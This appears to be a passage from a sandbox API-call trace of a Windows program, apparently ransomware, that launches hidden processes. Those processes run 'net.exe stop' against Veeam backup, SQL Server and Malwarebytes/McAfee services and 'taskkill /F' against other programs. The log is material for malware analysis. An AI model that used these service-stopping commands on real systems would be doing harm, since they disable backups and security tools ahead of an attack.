hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x4a4, hWritePipe=0x5f2f044*=0x3e0) returned 1 [0114.686] GetCurrentProcess () returned 0xffffffff [0114.686] GetCurrentProcess () returned 0xffffffff [0114.686] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x430) returned 1 [0114.686] CloseHandle (hObject=0x4a4) returned 1 [0114.687] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0114.687] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0114.687] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0114.687] CoTaskMemFree (pv=0x741d20) [0114.687] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamCloudSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2271c0c | out: lpCommandLine="\"net.exe\" stop VeeamCloudSvc /y", lpProcessInformation=0x2271c0c*(hProcess=0x3c4, hThread=0x4a4, dwProcessId=0x13d4, dwThreadId=0x13d8)) returned 1 [0114.717] CloseHandle (hObject=0x3e0) returned 1 [0114.718] GetFileType (hFile=0x430) returned 0x3 [0114.718] CloseHandle (hObject=0x4a4) returned 1 [0115.903] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0115.903] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x4a4, hWritePipe=0x5f2f044*=0x3e0) returned 1 [0115.903] GetCurrentProcess () returned 0xffffffff [0115.903] GetCurrentProcess () returned 0xffffffff [0115.904] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x514) returned 1 [0115.904] CloseHandle (hObject=0x4a4) returned 1 [0115.904] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0115.904] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0115.904] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0115.904] CoTaskMemFree (pv=0x741d20) [0115.904] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$TPS /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef84*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x262862c | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$TPS /y", lpProcessInformation=0x262862c*(hProcess=0x4a0, hThread=0x4a4, dwProcessId=0xc94, dwThreadId=0xddc)) returned 1 [0115.927] CloseHandle (hObject=0x3e0) returned 1 [0115.928] GetFileType (hFile=0x514) returned 0x3 [0115.928] CloseHandle (hObject=0x4a4) returned 1 [0117.744] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0117.744] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3e0, hWritePipe=0x5f2f044*=0x478) returned 1 [0117.744] GetCurrentProcess () returned 0xffffffff [0117.744] GetCurrentProcess () returned 0xffffffff [0117.745] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x4b0) returned 1 [0117.745] CloseHandle (hObject=0x3e0) returned 1 [0117.745] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0117.745] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0117.745] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0117.745] CoTaskMemFree (pv=0x741d20) [0117.745] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop masvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x2271ed0 | out: lpCommandLine="\"net.exe\" stop masvc /y", lpProcessInformation=0x2271ed0*(hProcess=0x414, hThread=0x3e0, dwProcessId=0xec4, dwThreadId=0xc88)) returned 1 [0117.751] CloseHandle (hObject=0x478) returned 1 [0117.751] GetFileType (hFile=0x4b0) returned 0x3 [0117.751] CloseHandle (hObject=0x3e0) returned 1 [0119.940] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0119.940] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x518, hWritePipe=0x5f2f044*=0x478) returned 1 [0119.940] GetCurrentProcess () returned 0xffffffff [0119.940] GetCurrentProcess () returned 0xffffffff [0119.940] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x518, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x534) returned 1 [0119.940] CloseHandle (hObject=0x518) returned 1 [0119.940] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.941] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0119.941] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0119.941] CoTaskMemFree (pv=0x741d20) [0119.941] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamDeploymentService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef80*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x478, hStdError=0x0), lpProcessInformation=0x26661e0 | out: lpCommandLine="\"net.exe\" stop VeeamDeploymentService /y", lpProcessInformation=0x26661e0*(hProcess=0x538, hThread=0x518, dwProcessId=0x10f0, dwThreadId=0x1124)) returned 1 [0119.955] CloseHandle (hObject=0x478) returned 1 [0119.955] GetFileType (hFile=0x534) returned 0x3 [0119.955] CloseHandle (hObject=0x518) returned 1 [0122.060] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0122.060] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x478, hWritePipe=0x5f2f044*=0x3cc) returned 1 [0122.060] GetCurrentProcess () returned 0xffffffff [0122.060] GetCurrentProcess () returned 0xffffffff [0122.060] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x4f4) returned 1 [0122.061] CloseHandle (hObject=0x478) returned 1 [0122.061] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0122.061] CoTaskMemAlloc (cb=0x20e) returned 0x733990 [0122.061] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x733990 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0122.061] CoTaskMemFree (pv=0x733990) [0122.061] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef80*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x2271a70 | out: lpCommandLine="\"net.exe\" stop MSSQLFDLauncher$TPSAMA /y", lpProcessInformation=0x2271a70*(hProcess=0x414, hThread=0x478, dwProcessId=0xe14, dwThreadId=0xe28)) returned 1 [0122.383] CloseHandle (hObject=0x3cc) returned 1 [0122.383] GetFileType (hFile=0x4f4) returned 0x3 [0122.384] CloseHandle (hObject=0x478) returned 1 [0123.569] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0123.569] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x478, hWritePipe=0x5f2f044*=0x3cc) returned 1 [0123.569] GetCurrentProcess () returned 0xffffffff [0123.569] GetCurrentProcess () returned 0xffffffff [0123.570] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x560) returned 1 [0123.570] CloseHandle (hObject=0x478) returned 1 [0123.570] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0123.570] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0123.570] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0123.570] CoTaskMemFree (pv=0x741d20) [0123.570] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MBAMService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x25381fc | out: lpCommandLine="\"net.exe\" stop MBAMService /y", lpProcessInformation=0x25381fc*(hProcess=0x54c, hThread=0x478, dwProcessId=0xf7c, dwThreadId=0xee4)) returned 1 [0124.453] CloseHandle (hObject=0x3cc) returned 1 [0124.453] GetFileType (hFile=0x560) returned 0x3 [0124.453] CloseHandle (hObject=0x478) returned 1 [0125.689] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0125.689] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x478, hWritePipe=0x5f2f044*=0x3cc) returned 1 [0125.689] GetCurrentProcess () returned 0xffffffff [0125.689] GetCurrentProcess () returned 0xffffffff [0125.689] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x478, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x4a0) returned 1 [0125.689] CloseHandle (hObject=0x478) returned 1 [0125.689] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.689] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0125.689] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0125.689] CoTaskMemFree (pv=0x741d20) [0125.689] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamDeploySvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3cc, hStdError=0x0), lpProcessInformation=0x22bf19c | out: lpCommandLine="\"net.exe\" stop VeeamDeploySvc /y", lpProcessInformation=0x22bf19c*(hProcess=0x418, hThread=0x478, dwProcessId=0xfe0, dwThreadId=0xf18)) returned 1 [0125.726] CloseHandle (hObject=0x3cc) returned 1 [0125.726] GetFileType (hFile=0x4a0) returned 0x3 [0125.727] CloseHandle (hObject=0x478) returned 1 [0129.378] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.378] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x3cc, hWritePipe=0x5f2f044*=0x444) returned 1 [0129.378] GetCurrentProcess () returned 0xffffffff [0129.378] GetCurrentProcess () returned 0xffffffff [0129.378] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x464) returned 1 [0129.378] CloseHandle (hObject=0x3cc) returned 1 [0129.378] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.378] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0129.378] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0129.378] CoTaskMemFree (pv=0x741d20) [0129.378] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLSERVER /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x444, hStdError=0x0), lpProcessInformation=0x227333c | out: lpCommandLine="\"net.exe\" stop MSSQLSERVER /y", lpProcessInformation=0x227333c*(hProcess=0x414, hThread=0x3cc, dwProcessId=0x758, dwThreadId=0xce4)) returned 1 [0129.608] CloseHandle (hObject=0x444) returned 1 [0129.608] GetFileType (hFile=0x464) returned 0x3 [0129.608] CloseHandle (hObject=0x3cc) returned 1 [0134.342] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0134.342] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x444, hWritePipe=0x5f2f044*=0x448) returned 1 [0134.343] GetCurrentProcess () returned 0xffffffff [0134.343] GetCurrentProcess () returned 0xffffffff [0134.343] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x3c4) returned 1 [0134.343] CloseHandle (hObject=0x444) returned 1 [0134.343] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0134.343] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0134.343] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0134.343] CoTaskMemFree (pv=0x741d20) [0134.343] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MBEndpointAgent /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef8c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2276364 | out: lpCommandLine="\"net.exe\" stop MBEndpointAgent /y", lpProcessInformation=0x2276364*(hProcess=0x4f4, hThread=0x444, dwProcessId=0x4e0, dwThreadId=0xcec)) returned 1 [0134.368] CloseHandle (hObject=0x448) returned 1 [0134.368] GetFileType (hFile=0x3c4) returned 0x3 [0134.368] CloseHandle (hObject=0x444) returned 1 [0138.358] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0138.358] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x504, hWritePipe=0x5f2f044*=0x518) returned 1 [0138.358] GetCurrentProcess () returned 0xffffffff [0138.358] GetCurrentProcess () returned 0xffffffff [0138.358] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x46c) returned 1 [0138.358] CloseHandle (hObject=0x504) returned 1 [0138.358] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0138.358] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0138.358] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0138.359] CoTaskMemFree (pv=0x741d20) [0138.359] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamEnterpriseManagerSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef78*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x518, hStdError=0x0), lpProcessInformation=0x2274fd4 | out: lpCommandLine="\"net.exe\" stop VeeamEnterpriseManagerSvc /y", lpProcessInformation=0x2274fd4*(hProcess=0x50c, hThread=0x504, dwProcessId=0xc44, dwThreadId=0x11d0)) returned 1 [0138.845] CloseHandle (hObject=0x518) returned 1 [0138.846] GetFileType (hFile=0x46c) returned 0x3 [0138.846] CloseHandle (hObject=0x504) returned 1 [0138.854] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0138.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.083] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.085] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.086] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.087] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.089] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.095] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.097] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.099] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.099] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.100] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.101] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.174] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0139.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0142.866] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0143.935] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0144.975] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.170] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.264] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.327] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0145.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0146.401] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0147.844] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0147.844] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x50c, hWritePipe=0x5f2f044*=0x4b0) returned 1 [0147.844] GetCurrentProcess () returned 0xffffffff [0147.844] GetCurrentProcess () returned 0xffffffff [0147.844] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x548) returned 1 [0147.845] CloseHandle (hObject=0x50c) returned 1 [0147.845] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0147.845] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0147.845] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0147.845] CoTaskMemFree (pv=0x741d20) [0147.845] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM mydesktopservice.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5f2ef7c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4b0, hStdError=0x0), lpProcessInformation=0x24990c0 | out: lpCommandLine="\"taskkill.exe\" /IM mydesktopservice.exe /F", lpProcessInformation=0x24990c0*(hProcess=0x520, hThread=0x50c, dwProcessId=0xad4, dwThreadId=0x690)) returned 1 [0147.863] CloseHandle (hObject=0x4b0) returned 1 [0147.863] GetFileType (hFile=0x548) returned 0x3 [0147.863] CloseHandle (hObject=0x50c) returned 1 [0149.431] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.431] CreatePipe (in: hReadPipe=0x5f2f048, hWritePipe=0x5f2f044, lpPipeAttributes=0x5f2efc8, nSize=0x0 | out: hReadPipe=0x5f2f048*=0x4b0, hWritePipe=0x5f2f044*=0x504) returned 1 [0149.431] GetCurrentProcess () returned 0xffffffff [0149.431] GetCurrentProcess () returned 0xffffffff [0149.431] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2f04c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2f04c*=0x464) returned 1 [0149.431] CloseHandle (hObject=0x4b0) returned 1 [0149.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.431] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0149.431] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0149.432] CoTaskMemFree (pv=0x741d20) [0149.432] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"taskkill.exe\" /IM CNTAoSMgr.exe /F", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, 